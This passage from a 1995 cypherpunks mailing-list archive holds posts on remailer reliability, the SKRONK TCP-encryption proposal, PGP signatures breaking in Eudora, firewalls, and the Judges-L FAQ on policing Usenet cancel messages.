of non-mainstream methods of access.

> 	Of course, letting encrypted traffic through your firewall
> will upset those people who thought they can virus/porn scan at the
> firewall.  Such scanners are almost always broken anyway.
> 
> Adam
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 						       -Hume
> 


-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sun, 5 Feb 95 15:52:39 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann charges dropped?
Message-ID: <v03001308ab5b146037be@[140.174.229.221]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 2/5/95, Timothy C. May wrote:

>I could of course try to get confirmation first from Phil, but he is
>notoriously hard to reach in e-mail...

Especially when he (and presumably his attorney Phil Dubois) are on the
road, as he is this week.  I'm trying to reach PRZ at his hotel to confirm
this.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 5 Feb 95 13:16:45 PST
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <m0raoM0-0009tFC@sdwsys>
Message-ID: <9502052116.AA01421@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: "Stephen D. Williams" <sdw@lig.net>
    Date: Sat, 4 Feb 1995 17:32:59 +0000 (GMT)
    
    'The Great Piss List' (whatever happened to it?)

As far as I know, Colin is still maintaining it although I haven't
corresponded with him recently.  You might try direct mail to 
Colin Owen Rafferty <colin@rafferty.com>

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david@arch.ping.dk (David Stodolsky)
Date: Tue Sep 07 12:49:18 1999
Subject: No Subject
Message-ID: <e55da1ebf2506d48b87733fd40dd6e96@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain




According to rules recently adopted, Judges-L FAQ ver. 2.1, 
one must register before being subscribed to the List. The 
Registration Form is at the end of the Judges-L FAQ below. 
Please read the Cancel Messages FAQ first, if you have not 
already done so. It has been posted to news.admin.policy.

Judges-L Registrar,
dss

============================================================


Welcome to Judges-L

The following Frequently Asked Questions with answers are 
designed to assist you in interacting with other subscribers 
to the Judges' List and thereby assist users of the NetNews 
system in dealing with certain types of abusive messages. 
Please do not post to the List until you have been a 
subscriber for a couple of weeks, so you can avoid the most 
common mistakes made by new subscribers. Alternatively you 
can review the activities of the List by retrieving archives 
of recent discussions. You can retrieve the list of archives 
by sending "INDEX  Judge-L" (not including quotation marks)  
to LISTSERV@UBVM.CC.BUFFALO.EDU (or LISTSERV@UBVM.BITNET).  
You can then  order these files with a "GET Judge-L  
LOGxxxx". For example, to get the first month's archive, send 
the command "GET JUDGES-L  LOG9409" to retrieve the archive 
for September of 1994. 

You can unsubscribe by sending the command "UNSUB JUDGES-L" 
in the body of a message to LISTSERV@UBVM.CC.BUFFALO.EDU (or 
LISTSERV@UBVM.BITNET).

Please retain this message for future reference.
-------------------------------------------------



Judges-L: Frequently Asked Questions (FAQ) ver. 2.1



What is the Judges-L?

The Judges' List (Judges-L@UBVM.cc.buffalo.edu or JUDGES-
L@UBVM.BITNET) is a LISTSERV mail distribution list. Messages 
for distribution must be sent to one of these addresses. 
Subscription and other LISTSERV commands must be sent to 
LISTSERV@UBVM.cc.buffalo.edu or LISTSERV@UBVM.BITNET.



How does the Judges' List work?

The List distributes messages to a panel of Judges who cancel 
multiple posts to NetNews immediately. The List is used to 
help Judges organize themselves, finalize policy, and set 
procedures to enforce rules. It is primarily directed to 
those who issue cancels. Secondarily, to those who survey 
cancels issued, in order to ensure that the cancel facility 
is not being abused.

It is not the intention of the Judges to regulate the content 
of articles posted. The protection of the NetNews system from 
overload by posts to multiple newsgroups is the focus of the 
activity. Widespread posting of off-topic material and 
overloads of individual newsgroups is a secondary focus of 
discussion.

Mechanisms for the control of automatic posting software or 
automatic cancellation software is within the scope of 
discussion. Security mechanisms to facilitate the 
cancellation of abusive posts is also within the scope of the 
List.

Certain activities, such as voting, are restricted to 
registered Judges. A Judge registers by supplying verifiable 
identity information to the Registrar. This information must 
be traceable to a primary identification document, such as a 
birth certificate. Supplied information is used only for the 
registration of a Judge. A digital signature, signed by a 
recognized certification authority can satisfy this 
requirement. The Registrar will acknowledge that registration 
has succeeded. Another option is transmission of a verifiable 
name, address, and telephone number (including best times to 
telephone). Any finger, X.500 directory, or Network 
Information Center entries, should also be supplied, in order 
to reduce the need for telephonic contact (use the form at 
the end of this post). Random checks may be undertaken from 
time to time to confirm the integrity of registration 
information. The List Registrar is currently David S. 
Stodolsky at address:
david@arch.ping.dk.



How are decisions made?

There are two types of messages distributed via the List. The 
first type is an informational message. The second type is an 
action message, which notifies readers that an official 
response is requested or pending. A response to a previous 
message must begin with the characters "Re: " (note the 
trailing space). A message that starts a new discussion must 
not start with these characters. 

Action messages must be indicated by a message subject that 
starts with all capital letters.  Current message subject 
precursors are:

:"COMPLAINT: " - a complaint about a message that someone 
wants cancelled

:"CANCEL: " - a complaint about an inappropriate cancel 
message

:"DRAFT: " - a request for preliminary input on a proposed 
action

:"OPINION: " - a proposed action not directly related to a 
complaint

:"ACCEPTED: " - an accepted action

Decisions are preferably reached by consensus. The consensus 
is indicated by at least one week passing after an action 
message, or the last comment on an action message, has been 
distributed. Thus, if an OPINION message is posted and no 
comments are made in response to it for a week, it is 
considered to have achieved a consensus. The message will 
then be redistributed in exactly the same form, but with the 
ACCEPTED message precursor. If no objections are registered 
within a week, then this opinion becomes valid. (Objections 
at this stage can only be procedural, such as failure to 
incorporate corrections or not allowing adequate time for 
comments.) If comments are received, they must be answered or 
incorporated into the accepted message. In the case of 
extensive revision, the message should be distributed again 
with an OPINION message precursor. Accepted messages are 
transferred to the file area for permanent storage. Accepted 
opinions are also posted to USENET with "Judges" as their 
sender.

In the case that a consensus is not reached within three 
weeks after the final posting of an action message, the 
author of the message can call for a vote. After the call, 
the List Registrar will post the email addresses of 
registered voters. A voter is registered if s/he supplied 
registration information to the Registrar prior to the first 
presentation of the action item. Votes are directed to the 
author, or other designated vote counter, and may include a 
statement. After a week, all votes and comments are posted. 
If a complaint achieves majority support, it can be reposted 
as ACCEPTED. Contributed statements must be included. 
Opinions require two-thirds support to achieve acceptance.

If you reply to a message, but change the subject or address 
a side issue, change the subject line of the post using the 
"was" construction [i. e., New subject (was: Old subject)]. 
This is particularly important with action items, which can 
be delayed otherwise.



Do I have to wait a week before acting on a complaint?

No. Any Judge can act on a complaint at any time. The List 
and the person who submitted the complaint must be notified 
immediately. If a complaint receives no response, it is 
assumed to be invalid. A week after the final comment on a 
complaint, it may be reposted, including all comments, with 
an "ACCEPTED: " subject precursor. This is normally done by 
the Judge who initially responded to the complaint. Unless 
there are objections, it is transferred to the file area one 
week later. A Judge must not be the first respondent to a 
complaint submitted on her/his behalf.

A Judge should only respond to a complaint if confident that 
the response is appropriate. New Judges can develop their 
reputations by closely monitoring the List. This permits 
routine abuse to handled promptly by new Judges. More 
experienced Judges can then concentrate on handling 
complicated complaints or on incorrect responses made by 
novices.



What is the correct style for a message?

Messages to the List must follow USENET guidelines. See 
"Guidelines for posting on Usenet" and "Hints on writing 
style for Usenet" in the newsgroup "news.announce.newusers". 
Specifically, spell check your message and review it for 
accuracy. If you are irritated or upset, put it aside for a 
day, and then read both the message you are replying to and 
your response again. All messages to the List are archived 
and permanently available to subscribers.



What should I do about inappropriate messages?

Faulty or inappropriate messages should be ignored. You may 
notify the sender directly by email that there is a problem 
with such a message.

Since action items cannot be ignored, inappropriate messages 
of this type may result in censure of the sender. When in 
doubt as to the type of a message you are sending, do not use 
an action precursor. If it definitely is an action message, 
post it using the "DRAFT: " message precursor first, and 
allow at least a week for feedback. Draft messages should be 
used in all cases except where time is of the essence. 
Posting of a draft message immediately fixes the registered 
voters on the item, but reduces the risk of repeated updates 
while in the "OPINION: " phase. Since opinion messages 
require responses within a week, it is more likely that the 
feedback to them will be negative and will be less complete 
than feedback to a draft.



Can a message that has appeared on the Judges-L be reposted?

Only your own words can be reposted and only by you. Authors 
retain a non-exclusive non-transferable copyright on their 
own writing sent to the List. "Fair use" is limited to single 
words.

The non-exclusive transfer of copyright to the List Registrar 
ensures that the author can continue to use the words they 
have sent to the List, while at the same time those words can 
be used in a well controlled manner, for example, in an 
opinion issued by Judges-L. This is essential to the function 
of the List, since a participant in a dispute might try to 
block publication of an opinion by asserting copyright over 
crucial writing, if not pleased with the decision.

The non-transferability of the copyright retained by the 
author makes it impossible for List policy to be circumvented 
by a (legal) person who collects copyrights from various 
authors. It also ensures that only persons bound by the List 
policy can use material sent to the List in other contexts. 
This could also be crucial in stopping misuse of writing sent 
to the List.

"Fair use" is limited to single words. Copying of more than a 
single word violates fair use, since repeatedly copying pairs 
of words would permit the transfer of collective works from 
the List. That is, if pairs of words from a message were 
transferred repeatedly under "fair use", the original message 
could easily be assembled from the machine readable 
fragments:
"Copying shall not be used to create or to replace or 
substitute for anthologies, compilations, or collective 
works..."
{From the guidelines developed by the Ad Hoc Committee on 
Copyright Revision, the Author-Publisher Group, and the 
Association of American Publishers. COPYRIGHT LAW AND 
MULTIMEDIA DEVELOPMENT IN EDUCATION [DRAFT VERSION] in a 
document assembled by the Academic Computing Technologies 
Group, Johnson County Community College, Overland Park, KS 
66210 (in Mich Kabay <75300.3232@compuserve.com>. [27 
December 1994]. RISKS of guessing at Fair Use. RISKS DIGEST 
16.68. [URL: http://catless.ncl.ac.uk/Risks/16.68.html]}

Any subscriber posting messages to the Judges-L is bound by 
this copyright policy. Material posted by others falls under 
a Judge-L compilation copyright. Writing by persons not 
posting to the List themselves is covered by a compilation 
copyright held by the sender and the List, and subject to the 
same restrictions, where ever applicable, as original 
writing. The terms "writing" and "words" are construed to 
include all forms of expression subject copyright, such as 
drawings, recorded sounds, and so on.

External archives of Judges-L messages and opinions can only 
be maintained if explicit written permission is given. 
Subscribers may, however, maintain archives of messages they 
have received while subscribed to the List, but only for 
their own private use and only as long as they remain 
subscribers.



Can I disclose information received from the List to third 
parties (persons not on the List)?

No. Privacy of messages sent to the List is crucial for the 
List to be able to perform its conflict resolution functions. 
Privacy makes uninhibited expression more likely, thus aiding 
in fact finding and resolution of disputes. It also protects 
authors from having their words used out of context. Finally, 
it inhibits persons not satisfied with a List decision from 
taking their complaints to another forum. The ability to 
achieve a final resolution of conflict is one of the major 
advantages of a judicial ruling.



What if I do not follow these guidelines?

Any person who provides false registration information will 
be prohibited from any use of the List for a period of five 
years and their postmaster, employer, or service provider 
will be notified thereof. At the end of that period a new 
registration form may be submitted. The document must be 
signed under penalty of perjury and notarized.

Any person misusing information from the List is subject to 
immediate unsubscription for a period of one year. A censure 
opinion must be submitted to the List immediately thereafter 
and copied to the person affected. All messages concerning 
the case must be copied to the concerned person, who may 
reply directly to the List. If the List has been set to 
automatically reject messages from the person as a result of 
abuse of the List, the person may select a representative to 
forward their replies. If the censure fails, the person will 
immediately be resubscribed.

In any case of involuntary unsubscription or of censure that 
casts doubt upon the honesty of a Judge, resubmission of 
registration information signed under penalty of perjury and 
notarized is required.
 
If you abuse the List by sending messages, you may be asked 
to stop sending for a period of six months, by issuance of an 
opinion. If you fail to honor this request, then your 
messages will be automatically rejected for a period of one 
year. An abuser may reapply after that time by sending a 
request to Dimitri Vulis (dlv@dm.com). In extreme cases, 
abusers will be unsubscribed from the List for a one-year 
period. Further problems will result in an abuser's 
postmaster being notified, or if the abuser is a postmaster, 
the notification will go to an employer or service provider. 
The Judges reserve the right to counter any continuing abuse 
of the List without further notice. 

Severe abuse can result in immediate action by a List Owner 
or Site Administrator. The Judges' List must be notified when 
any such action is taken.



How do I request censure of a Judge?

A Judge can submit an OPINION message to the List requesting 
that an abusive Judge cease, for example, sending to the 
List. Alternatively, the message can be directed to the 
Registrar, who will post it to the List, confirming that the 
message was submitted by a Judge, who wishes to remain 
anonymous. Other comments on the case may be directed to the 
Registrar, if authors wish to remain anonymous. In the case 
that a vote becomes necessary, the Registrar will randomly 
select nine Judges, if that many are available. They will be 
privately requested to deliver their votes to a designated 
Vote Counter. If three-fourths of the votes support the 
request, it will be posted as an ACCEPTED opinion by the Vote 
Counter. Dimitri Vulis (dlv@dm.com) receives such votes. 



How is conflict of interest avoided in censure cases?

Any selected Judge directly involved in the dispute must 
notify the Registrar that they are not available to vote. In 
the case this withdrawal could affect the vote outcome, a new 
Judge will be randomly selected. The accused may advise the 
Registrar that certain Judges are directly involved and 
should not be selected. No more than one-third of Judges may 
be designated as unsuitable. Neither the Registrar nor the 
Vote Counter may serve as voters in censure cases.



Why should I use this List instead of a newsgroup?

Discussions of abusive practices also occur in the 
newsgroups, for example, news.admin.policy. That newsgroup 
has over 50,000  readers and over 50% of articles are 
crossposted. Each post, therefore, uses a minimum of 20 man-
hours of readers' time, even if each reader spends only a 
second reading the subject line of an article. Examination of 
the post itself can lead to ten times that amount of time 
being used, or even more.  It is suggested, therefore, that 
posts to newsgroups be limited to novel incidents, with the 
potential for generating a new policy consensus. Routine 
abuse can be handled in a much more economical manner, if it 
is referred to this List.

Another advantage of using the List for cancel notifications 
is the almost immediate delivery of email. Newsgroup 
propagation is significantly slower, meaning that duplicate 
cancels may be issued. This can create problems and certainly 
means unnecessary work for administrators.

Consensus rarely occurs in newsgroups, if there is even the 
slightest disagreement on an issue. In order to create an 
alternative to arbitrary cancellation, cancellation wars 
between posters and administrators, and so on, it is 
important to reach a consensus through a process that is open 
and fair. A list makes it more likely that every person sees 
the same material, which cannot be assured with people 
browsing newsgroups. Also, lists are less "public", so there 
is less incentive for people to defend positions, merely 
because they have taken them. This is a well know problem in 
international negotiations. These factors, when combined with 
the procedures suggested here, make reaching a consensus on 
the List much more likely than in a newsgroup.

Another advantage of List operation is the privacy of the 
List archives. This makes it less likely that disputants 
seize upon details of statements made by Judges as indicating 
support for their position. The transfer of completed 
decisions to the  publicly assessable file area, on the other 
hand, make them more likely to be used as guidance in dispute 
resolution. These completed decisions can also be used as a 
database of known offenders, in order to facilitate dealing 
with repeated abuse. This effect is even stronger in the case 
of accepted opinions, which are posted to USENET.

Finally, there are some people who cannot understand that it 
is not OK to do anything that is not explicitly against some 
"law." These people need some "legal" decisions to abide by, 
because they will not stop abusive activities otherwise. They 
may also view cancellation of their articles as abridging 
their "free speech" or "restraining their trade" and take 
their complaint to a court. The Judges-L can be the court of 
first instance, thereby reducing the risk of interference by 
governmental authorities with activities on the Net.

-----------------------------------------------------------

            Judges-L Registration Form

This form serves as a copyright agreement, non-disclosure 
agreement, and oath:

I have read and understood the Cancel Messages Frequently 
Asked Questions (FAQ) list and the Judges-L FAQ. I understand 
why archive privacy is required and the role confidentiality 
plays in dispute resolution.

I agree to:

a) respect the Judge-L copyright and report any violations 
thereof.

b) avoid disclosing information received from the List to 
third parties (persons not on the List) and report any 
violations of this policy.

c) store messages received from the List in a manner that 
prevents disclosure to third parties (at minimum, password 
protection on a publicly accessible system, or residential 
level physical security for unprotected files or messages 
that have been printed ).

d) destroy all copies of messages from the List within 14 
days of unsubscribing (this does not apply to setting an 
address to "no mail", which stops transmission of messages).

e) follow the procedures accepted by the Judges (subscribers 
to Judges-L).

f) tell the truth, the whole truth, and nothing but the 
truth, in messages sent to the List or directly to persons 
subscribed to the List. That is, I agree that deception is to 
be avoided, either through incorrect statements or omission 
of relevant facts. If statements made in good faith are later 
found to be incorrect, the correct information will be 
supplied without delay. Not withstanding the above, if 
another subscriber is mislead by my statement and makes an 
incorrect statement on the List as a result, I will correct 
that person in a message to the List.

g) base any decision I make as a Judge only on messages to 
the List. If I receive communications concerning a matter 
under deliberation on Judges-L by other means (i. e., private 
mail, news, etc.), I will send a notice to the List. If I do 
not disclose the information, I will state why. Further, I 
will state whether I feel receipt of the information 
disqualifies me from further participation in the 
deliberation and why.

h) attempt to influence a Judges-L decisions only through 
messages posted to the List under my registered name.


I understand that if I violate this agreement I may be 
subject to censure and that an accepted censure opinion may 
be posted to the Judges-L public file area and published in 
appropriate USENET newsgroups. I agree to accept any such 
ruling as final.


Replace underlines "____" completely (in relevant items) with 
your information and return to:
david@arch.ping.dk

Last name                         __________________________
Other names, initials, titles, etc. ________________________
Address                           __________________________
City, State, Country, ZIP, etc.   __________________________
Telephone number (include country code) ____________________
Best times to Phone   From _____ to _____ and _____ to _____

Work or other address             __________________________
City, State, Country, ZIP, etc.   __________________________
Telephone number (include country code) ____________________
Best times to Phone   From _____ to _____ and _____ to _____

Finger entry                       _________________________
X.500 directory listing            _________________________
Network information center entries _________________________
                                   _________________________
Other directory entries            _________________________
                                   _________________________
                                   _________________________
                                   _________________________

-----------------------------------------------------------

===========================================================


David S. Stodolsky, PhD  * Social *   Internet: david@arch.ping.dk
Tornskadestien 2, st. th.   * Research *    Tel.: + 45 38 33 03 30
DK-2400 Copenhagen NV, Denmark  * Methods *  Fax: + 45 38 33 88 80





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 13:17:47 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502052024.PAA21302@bwh.harvard.edu>
Message-ID: <9502052117.AA02893@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack says:
> 	I was going to say some similar things about firewalls, but
> then decided that Strick is doing the right thing.  If the firewall
> wants to offer skronk'd services, it can respond to the UDP packet,
> and offer up services, presumably through relays.

I was going to mention something about not putting excess thought into
the fifth or sixth "encrypt tcp connections" hack I'm aware of, but...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 13:19:33 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb8zF-0009tFC@sdwsys>
Message-ID: <9502052119.AA02901@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams says:
> In otherwords: Since it looks like we're stuck with visible proxy
> firewalls for the forseeable future, we need to start codifying
> proxy-relay semantics into new protocol preambles.

Or simply codify the firewall techniques, a la the IETF AFT group...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 16:31:18 PST
To: cypherpunks@toad.com
Subject: Re: BROKEN REMAILERS
Message-ID: <ab5b1a2a020210049a0d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>I have tested remailers and their PGP keys over some time now and this is
>what I have found:
>
>MIXMASTER is a great, fast and reliable remailer but you can't PGP with it.
>
>REMAILER@NATELY.UCSD.EDU is just as fast and reliable (same guy) and you
>can use PGP, but a few weeks ago it started acting really funny: It will
>forward any ATTACHED files, but it will only read the first commandline
>of a PGP block that has been pgp'ed with Nately's public key.  In other
>words, if you wrap layers of chained remailers inside each other, you
>will now have to have NATELY as the *last* link in your chain as it will
>otherwise discard the rest of the block. Alternatively you can have the
>chain as a series of attached files.
>

I am not sure what is going on with remailer@nately. I just tested it,
sending a PGP encrypted message chained through it 3 times, I also sent a
message chained through nately to c2. They both worked fine. Are you using
a program to build the chain, like "Chain"? If so, which?


Mixmaster now has a PGP key (it has had one for a long time for testing
purposes, this is a new one). The front end for using mixmaster remailer
type 2 messages is on my WWW page. Right now it only runs on Suns.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAy8y6PAAAAEEAJF05HUUQM4n9G5wHOZ+bHZbF6yFmeX5wBGElssHqUnbb4PQ
S/f8jWvJyfiZkjlOkzOEJ47fZ++x+yYWgzKGUKp2ejIKu2MvnzgLfIkwKfxioPXq
xgBpLcFaDrbM52Mi4MEpEYW4DJqxk9TrAnHZBwXmxpOZQ57UcgbmF1BLzawNAAUR
tC5NaXhtYXN0ZXIgUmVtYWlsZXIgPG1peG1hc3RlckBuYXRlbHkudWNzZC5lZHU+
iQCVAwUQLzLpflVkk3dax7hlAQH2GQP9FGBU7uGako4YghrUNzyb3tcdwZwsGkBx
Gy9MGojOSwWgXQ0CRLD9+IWgkZnRY902pU65C3IZhFB7erXBk5eyGOXhbahHv07o
mhHRiE2v4Z9hNapWVHHeDo0F2AoL7B8kkiFjXI2fVYzofB6gmXd7X8Wzh/9AEQsz
63U8X9cbajyJAJUDBRAvMulXBuYXUEvNrA0BAQOkA/9QfgNGLp6MX1Qwk55uLiHG
ajeT+Rtgruaj9DPOoZFVj9w0pImBkCQNw5eA6iZTgiAqkbSG7RaR9yKMU27Gf/O+
yz3cWAx4slFmCpVDlEl5qSa1Bd+2LuneN4EvnxfeI7TLUIFKlPcIOnx9zsu5Ny0I
SCtHVHBaGw43OT1OYmLjgA==
=Zr4D
-----END PGP PUBLIC KEY BLOCK-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at The Yak <strick@yak.net>
Date: Sun, 5 Feb 95 17:06:28 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: "encrypt tcp connections" hacks
Message-ID: <199502060105.RAA07673@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, could you enumerate them?  I take your opinions more
seriously than perhaps I should, so I want to understand
what you're saying.

I'm not doing this to re-invent the wheel.  I'm doing it because
I need it, and nothing else is working very well for me.

I'm doing it because I don't see anything that's easy-to-use in wide
use today.  I don't just want one or two encrypted applications -- like
the Kerberos telnet and rcp -- but something to transparently provide
privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
NNTP, X11, FTP, MUDs, etc.

Let me name the ones I can think of.

  1.  	Matt Blaze just announced one.  As always, he has the best
	crypto.  But his world interface seems to be a hacked up
	script.c.  If I lift his crypto, and make it a standard
	module in Skronk, I can reuse 90% of his good work.

  2.	Kerberos4.  I use Kerberos4 between home and work all the time.
	However the only command I have that actually encrypts the
	session is the "rlogin" replacement.  (But I sure use it, even 
	if it's just DES.)

	Also Kerberos administration is a nightmare.  I'm a fairly
	knowledgeable crypto hacker and unix system administrator but
	honestly I don't understand what I did.  If it weren't for
	the Cygnus installation manuals giveing line-by-line
	instructions, I wouldn't have made it.  I've taken the 
	reference manuals to bed with me several times, but still
	haven't gotten a grasp of how to fully use it.

	And the reason big providers like The Well and Netcom won't
	run kerberos (or at least not the last time I asked) is that
	they would have to hire another person just to do the
	password management etc.  Skronk should be "just plug it in
	and it works".  There should be no reason why big providers
	can't offer it as an option.

  3.	Kerberos5.  I've been unable to build Kerberos5 on my 
	sun3.  Honestly.  To build it, I have to have ISODE, which seems 
	to be some enormous ISO thing that I haven't been able to build.

	Again, not too encouraging for your average unix sys admin.

  4.	The new telnet program with Telnet Options for authentication
	and encrytion.  Well it won't do encryption unless you
	can get the authentication done, and so you're back to 
	problems 2 and 3 above.  I couldn't get it to work in 
	an evening, and decided the world needed something better.
	Also even if it did work, it's only Telnet.  None of the other
	apps I named above can use it.

  5.	Standards for IPng.  Vapor, as far as I know.  Is there any
	usable code, that works in IP this generation?


I think it comes down to the fact that, of these, only Skronk and 
Blaze's software use a Diffee-Hellman -like Key Exchange so that
administration stuff doesn't have to be done by humans and footnet.

The real value I'm adding is not the crypto.  It's the packaging.
When I'm done it should be possible to skronk all your current 
clients and servers by just overriding the shared library libc.so,
running a skronk map UDP daemon, and customizing a configuration
file to tell the daemon what to say.


=================

As for the UDP service:

> UDP won't get through most firewalls.
> 
> Build in support for non-transparent firewalls (ie: telnet gatekeeper,
> c sys port).

UDP packets are for automatic configuration of skronk maps.  
Skronk maps could be announced other ways too -- including via
manual configuration, where you put skronk maps in your SKRONK_CONF
environment variable.

I may have to spend more effort on this than I wanted to.   I have
a SKRONK_CONF variable, and an option to say "dont ask the UDP 
skronk map daemon" about this port, just skronk it -- but right now 
it's only dependant on port number, not on the IP address too.
This can be fixed.

> UDP Port 333 - does this imply you need to be root to use it,
> at least as a server, or are only TCP ports typically root-limited
> for low-number ports?
>                 Bill

You need to be root to install it properly on your system, for the
skronked services to become bona fide system services.  Users should
not be able to hijack SMTP and TELNET connections to a site unless
they're root.

For people who run their own web server on a nonstandard port on a 
machine that someone else administers -- we're back to the manual
configuration method.  Maybe we can build a PGP service with 
signed certificates to collect nonstandard skronked services.  
But really I think these services will be marginal.



I had thought about using DNS TXT records.  But I decided against that
because a *lot* of people have autonomy over their workstation on
the net, but not over their DNS records.   Linux boxen in dorm rooms
come to mind.  Or anyone who puts a new machine on someone else's
ethernet, grabbing an IP address via ARP.


================= 

Thanks to everyone for your comments.

The discussion question is -- if we have so many hacks already -- 
howcome they're not in use.  I hope I found the reasons and addressed
them.  The firewalls issue bugs me a bit.  Would using a well-known
TCP port instead of the UDP port fix the problem?  I don't think 
so.  Firewalls will block my new TCP port as well.  Matt Ghio's
project to tunnel through the telnet port sounds good.  Of course,
that defeats the purpose of the firewall, which is not my aim.
My aim is to work with the internet and within its policies, so it
can get widespread use.

How much of skronk works today?  I'm nearing alpha of a version that's
hardwired to do DH exchange (using RSAREF2.0) and IDEA CBF (stolen from
PGP sources) for the symmetric encryption.  But I broke it recently
when I added hacks for servers to fake select() listening on both
skronked and normal ports, when the program only thinks it's only
listening on normal ports.


I gotta go ...     strick


==================


p.s.	need some wizard-level help here.

	I use syscall(2) when I reimplement read() write() connect()
	accept() etc. on SunOS. 

	On LINUX I borrowed code from the libc sources.

	On HPUX and Solaris and AIX I'm having difficulty finding
	a way to do what system calls do, without using the
	manufacture's packaging.  

	any help would be appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sun, 5 Feb 95 17:28:35 PST
To: tjb@acpub.duke.edu (Tom Bryce)
Subject: Re: signature validation on secure edit messages
Message-ID: <199502060128.AA07417@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Try turning Word Wrap off in Eudora.  I was encountering the same thing in the Windows version of Eudora.  With Word Wrap on, it seems to add CRs (or CR/LFs on a PC) to the end of each line upon sending.  This obviously causes a message not to match the signature, since all of those CRs weren't there when you composed it.  With Word Wrap off, your text still wraps on the screen when you're composing, but those unwanted CRs in the sent mail don't get added.

Joel McNamara
joelm@eskimo.com - finger for PGP key
    
>Jeez. I really don't know why the heck this always happens to me, my
>digsigs not validating.
>
>You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
>signature.
>
>I always write the message in eudora, copy it, sign it in MacPGP as TEXT
>with attached signature, then go back and paste it over the old message.
>Then I go back to MacPGP and check the signature on the clipboard to be
>sure - no problems. But after getting mailed, it doesn't work.
>
>Damn.
>
>Tom
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Feb 95 17:48:11 PST
To: cypherpunks@toad.com
Subject: Judge not...
Message-ID: <199502060147.RAA25515@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's something I though would probably be of interest to more than a
few here that read Usenet news.  First article is the "Cancel FAQ" put out
by the "Judges List", which many may have seen on the new.admin.*
groups.  Following it is the "Judges List" FAQ.  

I doubt this is a major threat, but is a good example of the sort of
thing that needs to be nipped in the bud.

If the "Cancel FAQ" doesn't trip any alarms, be sure to read the
following "Judges List" FAQ.  

Please pardon the length.

Articles follow:

Article xxxxx of news.admin.misc:
From: judges[tm]@arch.ping.dk (NetNews Judges[TM] List)
Newsgroups: news.admin.policy,comp.admin.policy,comp.security.misc,misc.legal.computing,news.admin.misc,news.groups.questions,news.groups,news.newusers.questions,alt.censorship,alt.comp.acad-freedom.talk,alt.current-events.net-abuse
Subject: Cancel Messages:  Frequently Asked Questions (FAQ)
Date: Sat, 4 Feb 95 16:29:13 +0100 (CET)
Organization: NetNews Judges[TM] List
Message-ID: <01050105.limupb@arch.ping.dk>
Reply-To: judges[tm]@arch.ping.dk (NetNews Judges[TM] List)
X-Mailer: uAccess - Macintosh Release: 1.6v2
Lines: 382


Cancel Messages:  Frequently Asked Questions (FAQ). Ver. 2.0


---------------------------------------------------------

Summary:

You can protect your reputation as a information source by 
cancelling articles posted under your name as soon as you 
discover that they are erroneous.

Cancelling other's articles, however, can expose you, 
your site, and the Net as a whole, to serious threats. The 
sender should be notified when articles need to be cancelled. 

Disputes or doubtful cases can be directed to the Judges' 
List for resolution.

---------------------------------------------------------

       List of Frequently Asked Questions


*** Purpose of this document

1) What are cancel messages?

2) How have cancel messages been used?

3) When should I issue a cancel message?

